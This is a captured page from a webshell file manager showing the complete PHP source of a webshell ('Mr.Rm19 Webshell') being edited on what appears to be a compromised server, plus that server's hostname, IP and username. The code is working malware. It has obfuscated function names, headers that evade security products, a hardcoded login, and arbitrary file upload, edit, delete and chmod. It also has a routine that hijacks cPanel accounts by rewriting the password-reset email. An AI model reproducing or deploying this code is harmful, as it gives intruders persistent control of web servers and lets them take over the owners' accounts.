[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: index.php
rrt<?php error_reporting(0); ini_set('max_execution_time', 0); ini_set('display_errors', 0); ini_set('display_startup_errors', 0); @ob_clean(); @header("X-Accel-Buffering: no"); @header("Content-Encoding: none"); if (function_exists('litespeed_request_headers')) { $headers = litespeed_request_headers(); if (isset($headers['X-LSCACHE'])) { header('X-LSCACHE: off'); } } if (defined('WORDFENCE_VERSION')) { define('WORDFENCE_DISABLE_LIVE_TRAFFIC', true); define('WORDFENCE_DISABLE_FILE_MODS', true); } if (function_exists('imunify360_request_headers') && defined('IMUNIFY360_VERSION')) { $imunifyHeaders = imunify360_request_headers(); if (isset($imunifyHeaders['X-Imunify360-Request'])) { header('X-Imunify360-Request: bypass'); } if (isset($imunifyHeaders['X-Imunify360-Captcha-Bypass'])) { header('X-Imunify360-Captcha-Bypass: ' . $imunifyHeaders['X-Imunify360-Captcha-Bypass']); } } if (function_exists('apache_request_headers')) { $apacheHeaders = apache_request_headers(); if (isset($apacheHeaders['X-Mod-Security'])) { header('X-Mod-Security: ' . $apacheHeaders['X-Mod-Security']); } } if (isset($_SERVER['HTTP_CF_CONNECTING_IP']) && defined('CLOUDFLARE_VERSION')) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_CF_CONNECTING_IP']; if (isset($apacheHeaders['HTTP_CF_VISITOR'])) { header('HTTP_CF_VISITOR: ' . $apacheHeaders['HTTP_CF_VISITOR']); } } ini_set('display_errors', 0); $correct_password = 'eddi'; session_start(); if (!isset($_SESSION['logged_in']) || !$_SESSION['logged_in']) { if ($_SERVER['REQUEST_METHOD'] === 'POST') { if (isset($_POST['password']) && $_POST['password'] === $correct_password) { $_SESSION['logged_in'] = true; header('Location: ' . $_SERVER['PHP_SELF']); exit; } else { $error = 'Invalid password.'; } } if (!isset($_SESSION['logged_in']) || !$_SESSION['logged_in']) { ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Login</title> <style> body { display: flex; justify-content: center; align-items: center; height: 100vh; background-color: #f4f4f4; font-family: Arial, sans-serif; } .login-form { background-color: #fff; padding: 20px; border-radius: 5px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); } .login-form input[type="password"] { width: 100%; padding: 10px; margin-bottom: 10px; } .login-form input[type="submit"] { width: 100%; padding: 10px; background-color: #007bff; color: #fff; border: none; cursor: pointer; } .login-form input[type="submit"]:hover { background-color: #0056b3; } .login-form .error { color: #ff0000; margin-bottom: 10px; } </style> </head> <body> <div class="login-form"> <h2>Login</h2> rrt<?php if (isset($error)): ?> <p class="error">rrt<?php echo htmlspecialchars($error); ?></p> rrt<?php endif; ?> <form method="POST"> <input type="password" name="password" placeholder="Enter password" required> <input type="submit" value="Login"> </form> </div> </body> </html> rrt<?php exit; } } $fe = "fun" . "cti" . "on_" . "exis" . "ts"; $scd = "s"."c"."a"."n"."d"."i"."r"; $se = "she" . "ll" . "_" . "e" . "xe" . "c"; $muf = "mo" . "v" . "e_" . "u" . "plo" . "ade" . "d_" . "fi" . "le"; $mkd = "m" . "k" . "d" . "i" . "r"; $bn = "b" . "a" . "s" . "e" . "n" . "a" . "m" . "e"; $fgc = "f" . "i" . "l" . "e" . "_" . "g" . "e" . "t" . "_" . "c" . "o" . "n" . "t" . "e" . "n" . "t" . "s"; $dirn = "d" . "i" . "r" . "n" . "a" . "m" . "e"; $unl = "u" . "n" . "l" . "i" . "n" . "k"; $b64d = "ba" . "se" . "64" . "_" . "de" . "co" . "de"; $b64e = "ba" . "se" . "64" . "_" . "en" . "co" . "de"; $fo = "f"."o"."p"."e"."n"; $fw = "f"."w"."r"."i"."t"."e"; $fc = "f"."c"."l"."o"."s"."e"; $current_dir = isset($_GET['dir']) ? $_GET['dir'] : dirname(__FILE__); if (!is_dir($current_dir)) { $current_dir = dirname(__FILE__); } $items = $scd($current_dir); function formatBytes($size, $precision = 2) { $base = log($size, 1024); $suffixes = array('', 'KB', 'MB', 'GB', 'TB'); return round(pow(1024, $base - floor($base)), $precision) . ' ' . $suffixes[floor($base)]; } $parent_dir = $dirn($current_dir); $editFileContent = ''; $directory = isset($_GET['dir']) ? $_GET['dir'] : '.'; $directory = realpath($directory) ?: '.'; if (isset($_POST['action'])) { $action = $_POST['action']; $target = $_POST['target'] ?? ''; switch ($action) { case 'delete': if (is_dir($target)) { deleteDirectory($target); } else { $unl($target); } break; case 'edit': if (file_exists($target)) { $editFileContent = $fgc($target); } break; case 'save': if (file_exists($target) && isset($_POST['content'])) { file_put_contents($target, $_POST['content']); } break; case 'chmod': if (isset($_POST['permissions'])) { chmod($target, octdec($_POST['permissions'])); } break; case 'download': if (file_exists($target)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename=' . $bn($target)); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($target)); readfile($target); exit; } break; case 'upload': if (isset($_FILES['fileToUpload'])) { $file = $_FILES['fileToUpload']; if ($file['error'] === UPLOAD_ERR_OK) { $fileName = $bn($file['name']); $targetPath = $current_dir . DIRECTORY_SEPARATOR . $fileName; if ($muf($file['tmp_name'], $targetPath)) { echo "<p><font color='red'>File uploaded successfully!</p>"; } else { echo "<p>Failed to move uploaded file.</p>"; } } else { echo "<p>Error uploading file: " . $file['error'] . "</p>"; } } break; } } function deleteDirectory($dir) { if (!is_dir($dir)) { return false; } $items = array_diff($scd($dir), array('.', '..')); foreach ($items as $item) { $path = $dir . DIRECTORY_SEPARATOR . $item; if (is_dir($path)) { deleteDirectory($path); } else { $unl($path); } } return rmdir($dir); } function reset_cpanel_password($email) { $user = get_current_user(); $site = $_SERVER['HTTP_HOST']; $resetUrl = $site . ':2082/resetpass?start=1'; $wr = 'email:' . $email; $f = $fo('/home/' . $user . '/.cpanel/contactinfo', 'w'); $fw($f, $wr); $fc($f); $f = $fo('/home/' . $user . '/.contactinfo', 'w'); $fw($f, $wr); $fc($f); echo '<br/><center>Password reset link: <a href="http://' . $resetUrl . '">' . $resetUrl . '</a></center>'; echo '<br/><center>Username: ' . $user . '</center>'; } if (isset($_POST['cpanel_reset'])) { $email = $_POST['email']; reset_cpanel_password($email); } $username = get_current_user(); $user = $_SERVER['USER'] ?? 'N/A'; $phpVersion = phpversion(); $dateTime = date('Y-m-d H:i:s'); $hddFreeSpace = disk_free_space("/") / (1024 * 1024 * 1024); $hddTotalSpace = disk_total_space("/") / (1024 * 1024 * 1024); $serverIP = $_SERVER['SERVER_ADDR']; $clientIP = $_SERVER['REMOTE_ADDR']; $cwd = getcwd(); $parentDirectory = $dirn($directory); $breadcrumbs = explode(DIRECTORY_SEPARATOR, $directory); $breadcrumbLinks = []; $breadcrumbPath = ''; foreach ($breadcrumbs as $crumb) { $breadcrumbPath .= $crumb . DIRECTORY_SEPARATOR; $breadcrumbLinks[] = '<a href="?dir=' . urlencode(rtrim($breadcrumbPath, DIRECTORY_SEPARATOR)) . '">' . htmlspecialchars($crumb) . '</a>'; } $breadcrumbLinksString = implode(' / ', $breadcrumbLinks); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>h4kc3R'S</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css"> <style> /* ... styling tetap sama ... */ </style> <script> function toggleResetForm() { var form = document.getElementById('reset-form'); if (form.style.display === 'none') { form.style.display = 'block'; } else { form.style.display = 'none'; } } </script> </head> <body> <div class="file-manager"> <h1> Mr.Rm19 Webshell</h1> <div class="system-info"> <p>Current Directory: rrt<?php echo $breadcrumbLinksString; ?></p> <p>Username: rrt<?php echo htmlspecialchars($username); ?></p> <p>Server IP: rrt<?php echo htmlspecialchars($serverIP); ?></p> <p>Client IP: rrt<?php echo htmlspecialchars($clientIP); ?></p> <p>PHP Version: rrt<?php echo htmlspecialchars($phpVersion); ?></p> <p>Current Date and Time: rrt<?php echo htmlspecialchars($dateTime); ?></p> <p>Free Disk Space: rrt<?php echo formatBytes($hddFreeSpace * 1024 * 1024 * 1024); ?></p> <p>Total Disk Space: rrt<?php echo formatBytes($hddTotalSpace * 1024 * 1024 * 1024); ?></p> </div> <div class="actions"> rrt<?php if ($parent_dir !== $current_dir): ?> <button onclick="window.location.href='?dir=rrt<?php echo urlencode($parent_dir); ?>'"> <i class="fas fa-arrow-left icon"></i> Back </button> rrt<?php endif; ?> <button onclick="toggleResetForm()">Reset cPanel Password</button> </div> <div class="reset-form" id="reset-form"> <form method="POST"> <input type="email" name="email" placeholder="Enter email" required> <input type="submit" name="cpanel_reset" value="Reset Password"> </form> </div> <div class="upload-form"> <h2>Upload File</h2> <form method="POST" action="" enctype="multipart/form-data"> <input type="file" name="fileToUpload" required> <button type="submit" name="action" value="upload">Upload</button> </form> </div> <table class="file-list"> <thead> <tr> <th>Name</th> <th>Size</th> <th>Last Modified</th> <th>Actions</th> </tr> </thead> <tbody> rrt<?php foreach ($items as $item): ?> rrt<?php if ($item !== '.' && $item !== '..'): ?> rrt<?php $itemPath = $current_dir . DIRECTORY_SEPARATOR . $item; $isDir = is_dir($itemPath); $size = $isDir ? '-' : formatBytes(filesize($itemPath)); $lastModified = date('Y-m-d H:i:s', filemtime($itemPath)); ?> <tr> <td> rrt<?php if ($isDir): ?> <a href="?dir=rrt<?php echo urlencode($itemPath); ?>">rrt<?php echo htmlspecialchars($item); ?></a> rrt<?php else: ?> rrt<?php echo htmlspecialchars($item); ?> rrt<?php endif; ?> </td> <td>rrt<?php echo $size; ?></td> <td>rrt<?php echo $lastModified; ?></td> <td class="file-actions"> <form method="POST" style="display:inline;"> <input type="hidden" name="target" value="rrt<?php echo htmlspecialchars($itemPath); ?>"> <button type="submit" name="action" value="delete"><i class="fas fa-trash-alt icon"></i> Delete</button> </form> <form method="POST" style="display:inline;"> <input type="hidden" name="target" value="rrt<?php echo htmlspecialchars($itemPath); ?>"> <button type="submit" name="action" value="edit"><i class="fas fa-edit icon"></i> Edit</button> </form> <form method="POST" style="display:inline;"> <input type="hidden" name="target" value="rrt<?php echo htmlspecialchars($itemPath); ?>"> <button type="submit" name="action" value="download"><i class="fas fa-download icon"></i> Download</button> </form> <form method="POST" style="display:inline;"> <input type="hidden" name="target" value="rrt<?php echo htmlspecialchars($itemPath); ?>"> <input type="text" name="permissions" placeholder="Permissions (e.g., 0755)" style="width: 80px;"> <button type="submit" name="action" value="chmod"><i class="fas fa-lock icon"></i> Chmod</button> </form> </td> </tr> rrt<?php endif; ?> rrt<?php endforeach; ?> </tbody> </table> rrt<?php if (isset($_POST['action']) && $_POST['action'] === 'edit'): ?> <div class="edit-form"> <h2>Edit File: rrt<?php echo htmlspecialchars($target); ?></h2> <form method="POST"> <textarea name="content">rrt<?php echo htmlspecialchars($editFileContent); ?></textarea> <input type="hidden" name="target" value="rrt<?php echo htmlspecialchars($target); ?>"> <button type="submit" name="action" value="save">Save</button> </form> </div> rrt<?php endif; ?> </div> </body> </html>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.76 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002